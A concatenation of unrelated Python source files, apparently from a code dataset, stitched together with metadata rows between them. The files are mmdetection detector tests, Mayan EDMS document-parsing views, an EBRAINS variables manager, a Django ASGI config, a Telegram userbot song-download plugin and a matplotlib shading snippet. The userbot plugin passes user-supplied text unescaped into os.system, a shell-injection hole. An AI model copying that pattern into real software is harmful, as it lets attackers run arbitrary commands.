'retinanet/retinanet_r50_fpn_1x_coco.py',
'guided_anchoring/ga_retinanet_r50_fpn_1x_coco.py',
'ghm/retinanet_ghm_r50_fpn_1x_coco.py',
'fcos/fcos_center_r50_caffe_fpn_gn-head_1x_coco.py',
'foveabox/fovea_align_r50_fpn_gn-head_4x4_2x_coco.py',
# 'free_anchor/retinanet_free_anchor_r50_fpn_1x_coco.py',
# 'atss/atss_r50_fpn_1x_coco.py', # not ready for topk
'reppoints/reppoints_moment_r50_fpn_1x_coco.py',
'yolo/yolov3_mobilenetv2_320_300e_coco.py',
'yolox/yolox_tiny_8x8_300e_coco.py'
])
def test_single_stage_forward_gpu(cfg_file):
if not torch.cuda.is_available():
import pytest
pytest.skip('test requires GPU and torch+cuda')
model = _get_detector_cfg(cfg_file)
model = _replace_r50_with_r18(model)
model.backbone.init_cfg = None
from mmdet.models import build_detector
detector = build_detector(model)
input_shape = (2, 3, 128, 128)
mm_inputs = _demo_mm_inputs(input_shape)
imgs = mm_inputs.pop('imgs')
img_metas = mm_inputs.pop('img_metas')
detector = detector.cuda()
imgs = imgs.cuda()
# Test forward train
gt_bboxes = [b.cuda() for b in mm_inputs['gt_bboxes']]
gt_labels = [g.cuda() for g in mm_inputs['gt_labels']]
losses = detector.forward(
imgs,
img_metas,
gt_bboxes=gt_bboxes,
gt_labels=gt_labels,
return_loss=True)
assert isinstance(losses, dict)
# Test forward test
with torch.no_grad():
img_list = [g[None, :] for g in imgs]
batch_results = []
for one_img, one_meta in zip(img_list, img_metas):
result = detector.forward([one_img], [[one_meta]],
return_loss=False)
batch_results.append(result)
def test_faster_rcnn_ohem_forward():
model = _get_detector_cfg(
'faster_rcnn/faster_rcnn_r50_fpn_ohem_1x_coco.py')
model = _replace_r50_with_r18(model)
model.backbone.init_cfg = None
from mmdet.models import build_detector
detector = build_detector(model)
input_shape = (1, 3, 100, 100)
# Test forward train with a non-empty truth batch
mm_inputs = _demo_mm_inputs(input_shape, num_items=[10])
imgs = mm_inputs.pop('imgs')
img_metas = mm_inputs.pop('img_metas')
gt_bboxes = mm_inputs['gt_bboxes']
gt_labels = mm_inputs['gt_labels']
losses = detector.forward(
imgs,
img_metas,
gt_bboxes=gt_bboxes,
gt_labels=gt_labels,
return_loss=True)
assert isinstance(losses, dict)
loss, _ = detector._parse_losses(losses)
assert float(loss.item()) > 0
# Test forward train with an empty truth batch
mm_inputs = _demo_mm_inputs(input_shape, num_items=[0])
imgs = mm_inputs.pop('imgs')
img_metas = mm_inputs.pop('img_metas')
gt_bboxes = mm_inputs['gt_bboxes']
gt_labels = mm_inputs['gt_labels']
losses = detector.forward(
imgs,
img_metas,
gt_bboxes=gt_bboxes,
gt_labels=gt_labels,
return_loss=True)
assert isinstance(losses, dict)
loss, _ = detector._parse_losses(losses)
assert float(loss.item()) > 0
@pytest.mark.parametrize(
'cfg_file',
[
# 'cascade_rcnn/cascade_mask_rcnn_r50_fpn_1x_coco.py',
'mask_rcnn/mask_rcnn_r50_fpn_1x_coco.py',
# 'grid_rcnn/grid_rcnn_r50_fpn_gn-head_2x_coco.py',
# 'ms_rcnn/ms_rcnn_r50_fpn_1x_coco.py',
# 'htc/htc_r50_fpn_1x_coco.py',
# 'panoptic_fpn/panoptic_fpn_r50_fpn_1x_coco.py',
# 'scnet/scnet_r50_fpn_20e_coco.py',
# 'seesaw_loss/mask_rcnn_r50_fpn_random_seesaw_loss_normed_mask_mstrain_2x_lvis_v1.py' # noqa: E501
])
def test_two_stage_forward(cfg_file):
models_with_semantic = [
'htc/htc_r50_fpn_1x_coco.py',
'panoptic_fpn/panoptic_fpn_r50_fpn_1x_coco.py',
'scnet/scnet_r50_fpn_20e_coco.py',
]
if cfg_file in models_with_semantic:
with_semantic = True
else:
with_semantic = False
model = _get_detector_cfg(cfg_file)
model = _replace_r50_with_r18(model)
model.backbone.init_cfg = None
# Save cost
if cfg_file in [
'seesaw_loss/mask_rcnn_r50_fpn_random_seesaw_loss_normed_mask_mstrain_2x_lvis_v1.py' # noqa: E501
]:
model.roi_head.bbox_head.num_classes = 80
model.roi_head.bbox_head.loss_cls.num_classes = 80
model.roi_head.mask_head.num_classes = 80
model.test_cfg.rcnn.score_thr = 0.05
model.test_cfg.rcnn.max_per_img = 100
from mmdet.models import build_detector
detector = build_detector(model)
input_shape = (1, 3, 128, 128)
# Test forward train with a non-empty truth batch
mm_inputs = _demo_mm_inputs(
input_shape, num_items=[10], with_semantic=with_semantic)
imgs = mm_inputs.pop('imgs')
img_metas = mm_inputs.pop('img_metas')
losses = detector.forward(imgs, img_metas, return_loss=True, **mm_inputs)
assert isinstance(losses, dict)
loss, _ = detector._parse_losses(losses)
loss.requires_grad_(True)
assert float(loss.item()) > 0
loss.backward()
# Test forward train with an empty truth batch
mm_inputs = _demo_mm_inputs(
input_shape, num_items=[0], with_semantic=with_semantic)
imgs = mm_inputs.pop('imgs')
img_metas = mm_inputs.pop('img_metas')
losses = detector.forward(imgs, img_metas, return_loss=True, **mm_inputs)
assert isinstance(losses, dict)
loss, _ = detector._parse_losses(losses)
loss.requires_grad_(True)
assert float(loss.item()) > 0
loss.backward()
# Test forward test
with torch.no_grad():
img_list = [g[None, :] for g in imgs]
batch_results = []
for one_img, one_meta in zip(img_list, img_metas):
result = detector.forward([one_img], [[one_meta]],
return_loss=False)
batch_results.append(result)
cascade_models = [
'cascade_rcnn/cascade_mask_rcnn_r50_fpn_1x_coco.py',
'htc/htc_r50_fpn_1x_coco.py',
'scnet/scnet_r50_fpn_20e_coco.py',
]
# test empty proposal in roi_head
with torch.no_grad():
# test no proposal in the whole batch
detector.simple_test(
imgs[0][None, :], [img_metas[0]], proposals=[torch.empty((0, 4))])
# test no proposal of aug
features = detector.extract_feats([imgs[0][None, :]] * 2)
detector.roi_head.aug_test(features, [torch.empty((0, 4))] * 2,
[[img_metas[0]]] * 2)
# test rcnn_test_cfg is None
if cfg_file not in cascade_models:
feature = detector.extract_feat(imgs[0][None, :])
bboxes, scores = detector.roi_head.simple_test_bboxes(
feature, [img_metas[0]], [torch.empty((0, 4))], None)
assert all([bbox.shape == torch.Size((0, 4)) for bbox in bboxes])
assert all([
score.shape == torch.Size(
(0, detector.roi_head.bbox_head.fc_cls.out_features))
for score in scores
])
        # test a batch where some images have no proposals
x1y1 = torch.randint(1, 100, (10, 2)).float()
# x2y2 must be greater than x1y1
x2y2 = x1y1 + torch.randint(1, 100, (10, 2))
detector.simple_test(
imgs[0][None, :].repeat(2, 1, 1, 1), [img_metas[0]] * 2,
proposals=[torch.empty((0, 4)),
torch.cat([x1y1, x2y2], dim=-1)])
# test no proposal of aug
detector.roi_head.aug_test(
features, [torch.cat([x1y1, x2y2], dim=-1),
torch.empty((0, 4))], [[img_metas[0]]] * 2)
# test rcnn_test_cfg is None
if cfg_file not in cascade_models:
feature = detector.extract_feat(imgs[0][None, :].repeat(
2, 1, 1, 1))
bboxes, scores = detector.roi_head.simple_test_bboxes(
feature, [img_metas[0]] * 2,
[torch.empty((0, 4)),
torch.cat([x1y1, x2y2], dim=-1)], None)
assert bboxes[0].shape == torch.Size((0, 4))
assert scores[0].shape == torch.Size(
(0, detector.roi_head.bbox_head.fc_cls.out_features))
@pytest.mark.parametrize(
'cfg_file', ['ghm/retinanet_ghm_r50_fpn_1x_coco.py', 'ssd/ssd300_coco.py'])
def test_single_stage_forward_cpu(cfg_file):
model = _get_detector_cfg(cfg_file)
model = _replace_r50_with_r18(model)
model.backbone.init_cfg = None
from mmdet.models import build_detector
detector = build_detector(model)
input_shape = (1, 3, 300, 300)
mm_inputs = _demo_mm_inputs(input_shape)
imgs = mm_inputs.pop('imgs')
img_metas = mm_inputs.pop('img_metas')
# Test forward train
gt_bboxes = mm_inputs['gt_bboxes']
gt_labels = mm_inputs['gt_labels']
losses = detector.forward(
imgs,
img_metas,
gt_bboxes=gt_bboxes,
gt_labels=gt_labels,
return_loss=True)
assert isinstance(losses, dict)
# Test forward test
with torch.no_grad():
img_list = [g[None, :] for g in imgs]
batch_results = []
for one_img, one_meta in zip(img_list, img_metas):
result = detector.forward([one_img], [[one_meta]],
return_loss=False)
batch_results.append(result)
def _demo_mm_inputs(input_shape=(1, 3, 300, 300),
num_items=None, num_classes=10,
with_semantic=False): # yapf: disable
"""Create a superset of inputs needed to run test or train batches.
Args:
input_shape (tuple):
input batch dimensions
num_items (None | List[int]):
specifies the number of boxes in each batch item
num_classes (int):
number of different labels a box might have
"""
from mmdet.core import BitmapMasks
(N, C, H, W) = input_shape
rng = np.random.RandomState(0)
imgs = rng.rand(*input_shape)
img_metas = [{
'img_shape': (H, W, C),
'ori_shape': (H, W, C),
'pad_shape': (H, W, C),
'filename': '<demo>.png',
'scale_factor': np.array([1.1, 1.2, 1.1, 1.2]),
'flip': False,
'flip_direction': None,
} for _ in range(N)]
gt_bboxes = []
gt_labels = []
gt_masks = []
for batch_idx in range(N):
if num_items is None:
num_boxes = rng.randint(1, 10)
else:
num_boxes = num_items[batch_idx]
cx, cy, bw, bh = rng.rand(num_boxes, 4).T
tl_x = ((cx * W) - (W * bw / 2)).clip(0, W)
tl_y = ((cy * H) - (H * bh / 2)).clip(0, H)
br_x = ((cx * W) + (W * bw / 2)).clip(0, W)
br_y = ((cy * H) + (H * bh / 2)).clip(0, H)
boxes = np.vstack([tl_x, tl_y, br_x, br_y]).T
class_idxs = rng.randint(1, num_classes, size=num_boxes)
gt_bboxes.append(torch.FloatTensor(boxes))
gt_labels.append(torch.LongTensor(class_idxs))
mask = np.random.randint(0, 2, (len(boxes), H, W), dtype=np.uint8)
gt_masks.append(BitmapMasks(mask, H, W))
mm_inputs = {
'imgs': torch.FloatTensor(imgs).requires_grad_(True),
'img_metas': img_metas,
'gt_bboxes': gt_bboxes,
'gt_labels': gt_labels,
'gt_bboxes_ignore': None,
'gt_masks': gt_masks,
}
if with_semantic:
# assume gt_semantic_seg using scale 1/8 of the img
gt_semantic_seg = np.random.randint(
0, num_classes, (1, 1, H // 8, W // 8), dtype=np.uint8)
mm_inputs.update(
{'gt_semantic_seg': torch.ByteTensor(gt_semantic_seg)})
return mm_inputs
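# Illustrative sketch (not part of the original tests; the shapes and counts
# below are assumptions): _demo_mm_inputs defined above can be reused for quick
# local debugging of any built detector, e.g.
#   mm_inputs = _demo_mm_inputs(input_shape=(1, 3, 128, 128), num_items=[5])
#   imgs = mm_inputs.pop('imgs')
#   img_metas = mm_inputs.pop('img_metas')
#   losses = detector.forward(imgs, img_metas, return_loss=True, **mm_inputs)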
def test_yolact_forward():
model = _get_detector_cfg('yolact/yolact_r50_1x8_coco.py')
model = _replace_r50_with_r18(model)
model.backbone.init_cfg = None
from mmdet.models import build_detector
detector = build_detector(model)
input_shape = (1, 3, 100, 100)
mm_inputs = _demo_mm_inputs(input_shape)
imgs = mm_inputs.pop('imgs')
img_metas = mm_inputs.pop('img_metas')
# Test forward train
detector.train()
gt_bboxes = mm_inputs['gt_bboxes']
gt_labels = mm_inputs['gt_labels']
gt_masks = mm_inputs['gt_masks']
losses = detector.forward(
imgs,
img_metas,
gt_bboxes=gt_bboxes,
gt_labels=gt_labels,
gt_masks=gt_masks,
return_loss=True)
assert isinstance(losses, dict)
# Test forward test
detector.eval()
with torch.no_grad():
img_list = [g[None, :] for g in imgs]
batch_results = []
for one_img, one_meta in zip(img_list, img_metas):
result = detector.forward([one_img], [[one_meta]],
rescale=True,
return_loss=False)
batch_results.append(result)
def test_detr_forward():
model = _get_detector_cfg('detr/detr_r50_8x2_150e_coco.py')
model.backbone.depth = 18
model.bbox_head.in_channels = 512
model.backbone.init_cfg = None
from mmdet.models import build_detector
detector = build_detector(model)
input_shape = (1, 3, 100, 100)
mm_inputs = _demo_mm_inputs(input_shape)
imgs = mm_inputs.pop('imgs')
img_metas = mm_inputs.pop('img_metas')
# Test forward train with non-empty truth batch
detector.train()
gt_bboxes = mm_inputs['gt_bboxes']
gt_labels = mm_inputs['gt_labels']
losses = detector.forward(
imgs,
img_metas,
gt_bboxes=gt_bboxes,
gt_labels=gt_labels,
return_loss=True)
assert isinstance(losses, dict)
loss, _ = detector._parse_losses(losses)
assert float(loss.item()) > 0
# Test forward train with an empty truth batch
mm_inputs = _demo_mm_inputs(input_shape, num_items=[0])
imgs = mm_inputs.pop('imgs')
img_metas = mm_inputs.pop('img_metas')
gt_bboxes = mm_inputs['gt_bboxes']
gt_labels = mm_inputs['gt_labels']
losses = detector.forward(
imgs,
img_metas,
gt_bboxes=gt_bboxes,
gt_labels=gt_labels,
return_loss=True)
assert isinstance(losses, dict)
loss, _ = detector._parse_losses(losses)
assert float(loss.item()) > 0
# Test forward test
detector.eval()
with torch.no_grad():
img_list = [g[None, :] for g in imgs]
batch_results = []
for one_img, one_meta in zip(img_list, img_metas):
result = detector.forward([one_img], [[one_meta]],
rescale=True,
return_loss=False)
batch_results.append(result)
def test_inference_detector():
from mmdet.apis import inference_detector
from mmdet.models import build_detector
from mmcv import ConfigDict
# small RetinaNet
num_class = 3
model_dict = dict(
type='RetinaNet',
backbone=dict(
type='ResNet',
depth=18,
num_stages=4,
out_indices=(3, ),
norm_cfg=dict(type='BN', requires_grad=False),
norm_eval=True,
style='pytorch'),
neck=None,
bbox_head=dict(
type='RetinaHead',
num_classes=num_class,
in_channels=512,
stacked_convs=1,
feat_channels=256,
anchor_generator=dict(
type='AnchorGenerator',
octave_base_scale=4,
scales_per_octave=3,
ratios=[0.5],
strides=[32]),
bbox_coder=dict(
type='DeltaXYWHBBoxCoder',
target_means=[.0, .0, .0, .0],
target_stds=[1.0, 1.0, 1.0, 1.0]),
),
test_cfg=dict(
nms_pre=1000,
min_bbox_size=0,
score_thr=0.05,
nms=dict(type='nms', iou_threshold=0.5),
max_per_img=100))
rng = np.random.RandomState(0)
img1 = rng.rand(100, 100, 3)
img2 = rng.rand(100, 100, 3)
model = build_detector(ConfigDict(model_dict))
config = _get_config_module('retinanet/retinanet_r50_fpn_1x_coco.py')
model.cfg = config
# test single image
result = inference_detector(model, img1)
assert len(result) == num_class
# test multiple image
result = inference_detector(model, [img1, img2])
assert len(result) == 2 and len(result[0]) == num_class
| 34.173107 | 111 | 0.604568 |
5256fc7c6d0c5384aabe91d5ebf9201c1f38571a | 6,449 | py | Python | mayan/apps/document_parsing/views.py | Syunkolee9891/Mayan-EDMS | 3759a9503a264a180b74cc8518388f15ca66ac1a | [
"Apache-2.0"
] | 1 | 2021-06-17T18:24:25.000Z | 2021-06-17T18:24:25.000Z | mayan/apps/document_parsing/views.py | Syunkolee9891/Mayan-EDMS | 3759a9503a264a180b74cc8518388f15ca66ac1a | [
"Apache-2.0"
] | 6 | 2020-06-05T22:45:29.000Z | 2022-03-11T23:57:53.000Z | mayan/apps/document_parsing/views.py | Syunkolee9891/Mayan-EDMS | 3759a9503a264a180b74cc8518388f15ca66ac1a | [
"Apache-2.0"
] | null | null | null | from __future__ import absolute_import, unicode_literals
from django.contrib import messages
from django.http import HttpResponseRedirect
from django.shortcuts import get_object_or_404
from django.urls import reverse_lazy
from django.utils.translation import ugettext_lazy as _, ungettext
from mayan.apps.common.generics import (
FormView, MultipleObjectConfirmActionView, SingleObjectDetailView,
SingleObjectDownloadView, SingleObjectEditView, SingleObjectListView
)
from mayan.apps.common.mixins import ExternalObjectMixin
from mayan.apps.documents.forms import DocumentTypeFilteredSelectForm
from mayan.apps.documents.models import Document, DocumentPage, DocumentType
from .forms import DocumentContentForm, DocumentPageContentForm
from .models import DocumentVersionParseError
from .permissions import (
permission_content_view, permission_document_type_parsing_setup,
permission_parse_document
)
from .utils import get_document_content
class DocumentContentView(SingleObjectDetailView):
form_class = DocumentContentForm
model = Document
object_permission = permission_content_view
def dispatch(self, request, *args, **kwargs):
result = super(DocumentContentView, self).dispatch(
request, *args, **kwargs
)
self.get_object().add_as_recent_document_for_user(request.user)
return result
def get_extra_context(self):
return {
'document': self.get_object(),
'hide_labels': True,
'object': self.get_object(),
'title': _('Content for document: %s') % self.get_object(),
}
class DocumentContentDownloadView(SingleObjectDownloadView):
model = Document
object_permission = permission_content_view
def get_file(self):
file_object = DocumentContentDownloadView.TextIteratorIO(
iterator=get_document_content(document=self.get_object())
)
return DocumentContentDownloadView.VirtualFile(
file=file_object, name='{}-content'.format(self.get_object())
)
class DocumentPageContentView(SingleObjectDetailView):
form_class = DocumentPageContentForm
model = DocumentPage
object_permission = permission_content_view
def dispatch(self, request, *args, **kwargs):
result = super(DocumentPageContentView, self).dispatch(
request, *args, **kwargs
)
self.get_object().document.add_as_recent_document_for_user(
request.user
)
return result
def get_extra_context(self):
return {
'hide_labels': True,
'object': self.get_object(),
'title': _('Content for document page: %s') % self.get_object(),
}
class DocumentParsingErrorsListView(SingleObjectListView):
view_permission = permission_content_view
def get_document(self):
return get_object_or_404(klass=Document, pk=self.kwargs['pk'])
def get_extra_context(self):
return {
'hide_object': True,
'object': self.get_document(),
'title': _(
'Parsing errors for document: %s'
) % self.get_document(),
}
def get_source_queryset(self):
return self.get_document().latest_version.parsing_errors.all()
class DocumentSubmitView(MultipleObjectConfirmActionView):
model = Document
object_permission = permission_parse_document
success_message = _(
'%(count)d document added to the parsing queue'
)
success_message_plural = _(
'%(count)d documents added to the parsing queue'
)
def get_extra_context(self):
queryset = self.object_list
result = {
'title': ungettext(
singular='Submit %(count)d document to the parsing queue?',
plural='Submit %(count)d documents to the parsing queue',
number=queryset.count()
) % {
'count': queryset.count(),
}
}
if queryset.count() == 1:
result.update(
{
'object': queryset.first(),
'title': _(
'Submit document "%s" to the parsing queue'
) % queryset.first()
}
)
return result
def object_action(self, instance, form=None):
instance.submit_for_parsing()
class DocumentTypeSettingsEditView(ExternalObjectMixin, SingleObjectEditView):
external_object_class = DocumentType
external_object_permission = permission_document_type_parsing_setup
external_object_pk_url_kwarg = 'pk'
fields = ('auto_parsing',)
post_action_redirect = reverse_lazy(viewname='documents:document_type_list')
def get_document_type(self):
return self.external_object
def get_extra_context(self):
return {
'object': self.get_document_type(),
'title': _(
'Edit parsing settings for document type: %s.'
) % self.get_document_type()
}
def get_object(self, queryset=None):
return self.get_document_type().parsing_settings
class DocumentTypeSubmitView(FormView):
extra_context = {
'title': _('Submit all documents of a type for parsing.')
}
form_class = DocumentTypeFilteredSelectForm
post_action_redirect = reverse_lazy(viewname='common:tools_list')
def get_form_extra_kwargs(self):
return {
'allow_multiple': True,
'permission': permission_parse_document,
'user': self.request.user
}
def form_valid(self, form):
count = 0
for document_type in form.cleaned_data['document_type']:
for document in document_type.documents.all():
document.submit_for_parsing()
count += 1
messages.success(
message=_(
'%(count)d documents added to the parsing queue.'
) % {
'count': count,
}, request=self.request
)
return HttpResponseRedirect(redirect_to=self.get_success_url())
class ParseErrorListView(SingleObjectListView):
extra_context = {
'hide_object': True,
'title': _('Parsing errors'),
}
view_permission = permission_document_type_parsing_setup
def get_source_queryset(self):
return DocumentVersionParseError.objects.all()
| 31.768473 | 80 | 0.656071 |
05909b7544b41abb1abf7245f32aa48b1ecd21b7 | 8,268 | py | Python | workflow_configuraitons_manager/xml_parsers/variables_manager.py | sontheimer/EBRAINS_ConfigManager | 5bbd8ee048e33d154d7287512d65bdcf2ca1a7d9 | [
"BSD-3-Clause"
] | null | null | null | workflow_configuraitons_manager/xml_parsers/variables_manager.py | sontheimer/EBRAINS_ConfigManager | 5bbd8ee048e33d154d7287512d65bdcf2ca1a7d9 | [
"BSD-3-Clause"
] | null | null | null | workflow_configuraitons_manager/xml_parsers/variables_manager.py | sontheimer/EBRAINS_ConfigManager | 5bbd8ee048e33d154d7287512d65bdcf2ca1a7d9 | [
"BSD-3-Clause"
] | null | null | null | # ------------------------------------------------------------------------------
# Copyright 2020 Forschungszentrum Jülich GmbH and Aix-Marseille Université
# "Licensed to the Apache Software Foundation (ASF) under one or more contributor
# license agreements; and to You under the Apache License, Version 2.0. "
#
# Forschungszentrum Jülich
# Institute: Institute for Advanced Simulation (IAS)
# Section: Jülich Supercomputing Centre (JSC)
# Division: High Performance Computing in Neuroscience
# Laboratory: Simulation Laboratory Neuroscience
# Team: Multi-scale Simulation and Design
#
# ------------------------------------------------------------------------------
# Co-Simulator Imports
from EBRAINS_ConfigManager.workflow_configuraitons_manager.xml_parsers import enums
from EBRAINS_ConfigManager.workflow_configuraitons_manager.xml_parsers import variables
from EBRAINS_ConfigManager.workflow_configuraitons_manager.xml_parsers import constants
from EBRAINS_ConfigManager.workflow_configuraitons_manager.xml_parsers import exceptions
from EBRAINS_ConfigManager.workflow_configuraitons_manager.xml_parsers import utils
class VariablesManager(object):
"""
Manages the variables related to the run-time environment
"""
__logger = None
def __init__(self, logger=None):
self.__logger = logger
self.__dict = {
# Actions XML files location
variables.CO_SIM_ACTIONS_DIR: {
constants.CO_SIM_VARIABLE_DESCRIPTION: 'Path to actions XML files',
constants.CO_SIM_VARIABLE_VALUE: None},
# Empty, TO BE USED AS A FAKE VALUE
variables.CO_SIM_EMPTY: {
constants.CO_SIM_VARIABLE_DESCRIPTION: 'empty string',
constants.CO_SIM_VARIABLE_VALUE: ''},
# Execution Environment <Local|Cluster>
variables.CO_SIM_EXECUTION_ENVIRONMENT: {
constants.CO_SIM_VARIABLE_DESCRIPTION: 'Co-Simulator Execution Environment',
constants.CO_SIM_VARIABLE_VALUE: None},
# Results Output Directory
variables.CO_SIM_RESULTS_DIR: {
constants.CO_SIM_VARIABLE_DESCRIPTION: 'Results files directory location',
constants.CO_SIM_VARIABLE_VALUE: None},
# Routines Directory Path
variables.CO_SIM_ROUTINES_DIR: {
constants.CO_SIM_VARIABLE_DESCRIPTION: 'Co-Simulation Routines directory location',
constants.CO_SIM_VARIABLE_VALUE: None},
}
def get_value(self, variable_name=None):
"""
:param variable_name: The environment variable name which the value is being gotten (requested)
:return: The value of the passed variable name
"""
return self.__dict[variable_name][constants.CO_SIM_VARIABLE_VALUE]
def set_value(self, variable_name=None, variable_value=None):
"""
:param variable_value:
:param variable_name:
:return:
"""
try:
self.__dict[variable_name][constants.CO_SIM_VARIABLE_VALUE] = variable_value
except KeyError:
self.__logger.error('{} has not been declared in the variable manager yet'.format(variable_name))
raise exceptions.CoSimVariableNotFound(co_sim_variable_name=variable_name)
return self.__dict[variable_name]
def set_co_sim_variable_values_from_variables_dict(self, variables_dictionary_source=None):
"""
:param variables_dictionary_source: Dictionary containing Co-Simulation Variables (CO_SIM_*)
:return:
"""
for key, value in variables_dictionary_source.items():
try:
self.__dict[key][constants.CO_SIM_VARIABLE_VALUE] = value
except KeyError:
self.__logger.error('{} is not a defined Co-Simulator variable'.format(key))
return enums.VariablesReturnCodes.VARIABLE_NOT_OK
return enums.VariablesReturnCodes.VARIABLE_OK
def create_variables_from_parameters_dict(self, input_dictionary=None):
"""
        Transforms the referenced variable names into their values based on CO_SIM_* variables.
CO_SIM_* variables are those referencing a value in the same XML configuration file.
e.g.
CO_SIM_RUNTIME_RESULTS_DIR -> represents the output path where the results files
will be written/read.
and could be referenced as follows:
<var_186>
<var_name>CO_SIM_VISUALIZATION_FILES_OUTPUT_PATH</var_name>
<var_value>CO_SIM_RUNTIME_RESULTS_DIR/visualizer</var_value>
</var_186>
Environment variables are those defined on the system where the Co-Simulation process is being run.
e.g.
${CO_SIM_TVB_NEST_PATH} -> represents the path where the TVB_NEST repository is located.
and could be referenced as follows:
<var_194>
<var_name>CO_SIM_XML_ACTIONS_DIR</var_name>
<var_value>${CO_SIM_TVB_NEST_PATH}/co_simulator/actions</var_value>
</var_194>
:param input_dictionary:
The private attribute object reference of the dictionary where the
variables will be transformed into its values
:return:
            XML_OK: All the referenced variables in the dictionary were properly
                        replaced by their values
            XML_CO_SIM_VARIABLE_ERROR: The value for a referenced variable could not be obtained
"""
for key, value in input_dictionary.items():
# transforming the CO_SIM_ references into its values
try:
runtime_variable_value = \
utils.transform_co_simulation_variables_into_values(variables_manager=self,
functional_variable_value=value)
except exceptions.CoSimVariableNotFound as CoSimVariableNotFound:
self.__logger.error(CoSimVariableNotFound)
# return enums.XmlManagerReturnCodes.XML_CO_SIM_VARIABLE_ERROR
return enums.ParametersReturnCodes.VARIABLE_NOT_FOUND
# creating the new CO_SIM_ variable
self.__dict[key] = {constants.CO_SIM_VARIABLE_DESCRIPTION: 'created on run time',
constants.CO_SIM_VARIABLE_VALUE: runtime_variable_value}
return enums.ParametersReturnCodes.PARAMETER_OK
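    # Illustrative call sequence (an assumption added for clarity, not part of
    # the original module; the dict names are hypothetical):
    #   manager = VariablesManager(logger=my_logger)
    #   manager.set_co_sim_variable_values_from_variables_dict(xml_variables_dict)
    #   manager.create_variables_from_parameters_dict(xml_parameters_dict)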
def create_co_sim_run_time_variables(self, action_plan_variables_dict=None, action_plan_parameters_dict=None):
"""
Sets RUN TIME Co-Simulation variables based on the content of the variables
and parameters set on the Action Plan XML file
:return:
VARIABLE_OK
"""
# CO_SIM_LAUNCHER
try:
execution_environment = \
self.__dict[variables.CO_SIM_EXECUTION_ENVIRONMENT][constants.CO_SIM_VARIABLE_VALUE]
except KeyError:
self.__logger.error('{} has not been set yet'.format(variables.CO_SIM_EXECUTION_ENVIRONMENT))
return enums.VariablesReturnCodes.VARIABLE_NOT_OK
else:
if execution_environment.upper() == 'LOCAL':
self.__dict[variables.CO_SIM_LAUNCHER] = \
{constants.CO_SIM_VARIABLE_DESCRIPTION: 'launcher created on run time',
constants.CO_SIM_VARIABLE_VALUE: 'mpirun'}
elif execution_environment.upper() == 'CLUSTER':
self.__dict[variables.CO_SIM_LAUNCHER] = \
{constants.CO_SIM_VARIABLE_DESCRIPTION: 'launcher created on run time',
constants.CO_SIM_VARIABLE_VALUE: 'srun'}
else:
self.__logger.error('{} wrong value set. <LOCAL|CLUSTER>'.format(
variables.CO_SIM_EXECUTION_ENVIRONMENT))
return enums.VariablesReturnCodes.VARIABLE_NOT_OK
return enums.VariablesReturnCodes.VARIABLE_OK
| 47.791908 | 114 | 0.641509 |
5a66fcb717c3a9151664741a2074a7f2373f4788 | 383 | py | Python | project/e2c/asgi.py | Tanukium/excel2csv | 44afc6d4ca241f48e12583e6c1209d881f466f49 | [
"MIT"
] | 9 | 2019-01-12T04:19:27.000Z | 2019-03-26T15:22:32.000Z | project/e2c/asgi.py | Tanukium/msemi | 40da6c4942cfffda31ba302ac0b8e6f8be2e86e4 | [
"MIT"
] | 1 | 2021-04-13T18:40:08.000Z | 2021-04-13T18:40:08.000Z | project/e2c/asgi.py | Tanukium/msemi | 40da6c4942cfffda31ba302ac0b8e6f8be2e86e4 | [
"MIT"
] | null | null | null | """
ASGI config for e2c project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'e2c.settings')
application = get_asgi_application()
| 22.529412 | 78 | 0.780679 |
b80ef368c958247ba1870cccbf0f4c08d067bec7 | 1,461 | py | Python | userbot/modules/instamusic.py | PratikGoswamiPM/OpenUserBot | 1ba7845522a5d5619d2705421a303aa82ce35abb | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | 1 | 2021-07-18T06:57:28.000Z | 2021-07-18T06:57:28.000Z | userbot/modules/instamusic.py | PratikGoswamiPM/OpenUserBot | 1ba7845522a5d5619d2705421a303aa82ce35abb | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | userbot/modules/instamusic.py | PratikGoswamiPM/OpenUserBot | 1ba7845522a5d5619d2705421a303aa82ce35abb | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | # Originally from Bothub
# Port to UserBot by @PM_The_Angry
from telethon import events
import subprocess
from telethon.errors import MessageEmptyError, MessageTooLongError, MessageNotModifiedError
import io
import asyncio
import time
#from userbot.utils import admin_cmd
from userbot.events import register
from userbot import bot, CMD_HELP
import glob
import os
try:
    import instantmusic
except ImportError:
    # dependency missing: install it on the fly, then import it
    os.system("pip install instantmusic")
    import instantmusic
os.system("rm -rf *.mp3")
def bruh(name):
os.system("instantmusic -q -s "+name)
@register(outgoing=True, pattern="^.song(?: |$)(.*)")
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
cmd = event.pattern_match.group(1)
reply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
await event.edit("searching song..please wait")
bruh(str(cmd))
l = glob.glob("*.mp3")
loa = l[0]
await event.edit("sending song")
await bot.send_file(
event.chat_id,
loa,
force_document=True,
allow_cache=False,
caption=cmd,
reply_to=reply_to_id
)
os.system("rm -rf *.mp3")
subprocess.check_output("rm -rf *.mp3",shell=True)
CMD_HELP.update({
"instamusic":
".song <songname>"
"\nUsage: For searching songs.\n"
})
| 23.564516 | 91 | 0.640657 |
68ed8bad0fbcb080d3932f731bc01ab9ad6ac8bc | 2,532 | py | Python | lms_code/plots/shading.py | tbenthompson/LMS_public | 1637e461ea269ae127a9da1fdba8e47a180c2ed2 | [
"MIT"
] | null | null | null | lms_code/plots/shading.py | tbenthompson/LMS_public | 1637e461ea269ae127a9da1fdba8e47a180c2ed2 | [
"MIT"
] | null | null | null | lms_code/plots/shading.py | tbenthompson/LMS_public | 1637e461ea269ae127a9da1fdba8e47a180c2ed2 | [
"MIT"
] | null | null | null | from pylab import *
# Taken from http://rnovitsky.blogspot.com/2010/04/using-hillshade-image-as-intensity.html
def set_shade(a,intensity=None,cmap=cm.jet,scale=10.0,azdeg=165.0,altdeg=45.0):
''' sets shading for data array based on intensity layer
or the data's value itself.
inputs:
a - a 2-d array or masked array
intensity - a 2-d array of same size as a (no chack on that)
representing the intensity layer. if none is given
the data itself is used after getting the hillshade values
see hillshade for more details.
